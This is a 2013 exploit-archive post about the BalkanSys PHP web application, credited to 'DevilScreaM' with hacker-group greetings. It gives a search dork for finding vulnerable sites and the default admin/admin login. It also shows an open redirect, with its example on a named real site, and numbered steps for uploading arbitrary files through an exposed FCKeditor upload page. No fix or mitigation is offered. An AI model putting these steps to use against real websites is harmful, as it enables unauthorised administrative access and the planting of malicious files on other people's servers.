BalkanSys suffers from default credentials, arbitrary file upload, and open redirection vulnerabilities. Note that this advisory has site-specific information.
8f26c405b63c9567a1ce3478b4d6d560ea287f16b230a9696b659a3b5169206f
#Title : BalkanSys Multiple Vulnerabilities
#Author : DevilScreaM
#Date : 10/26/2013
#Category : Web Applications
#Type : PHP
#Vendor : http://balkansys.com/
#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber
#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |
#Vulnerabillity : Default Password, Redirection, Arbitrary File Upload
#Dork : inurl:/?act=show_page
Admin Login bypass with Default User password
http://site-target/admin/
Username : admin
Password : admin
============================================================================================
Open Redirection
http://site-target/index.php?act=redirect&bid=1&url=[URL Redirect]
Example :
http://orpheusclub.com/index.php?act=redirect&bid=1&url=http://newbie-security.or.id/
============================================================================================
Arbitrary File Upload (FCKEditor) Special Thanks ReC0ded
http://site-target/admin/FCKeditor/editor/filemanager/connectors/uploadtest.html
1. Change Type From ASP to PHP
2. Select Your File, and Click Send to Server
3. Result Upload at
http://site-target/site_files/UserFiles/[YOUR_FILE].txt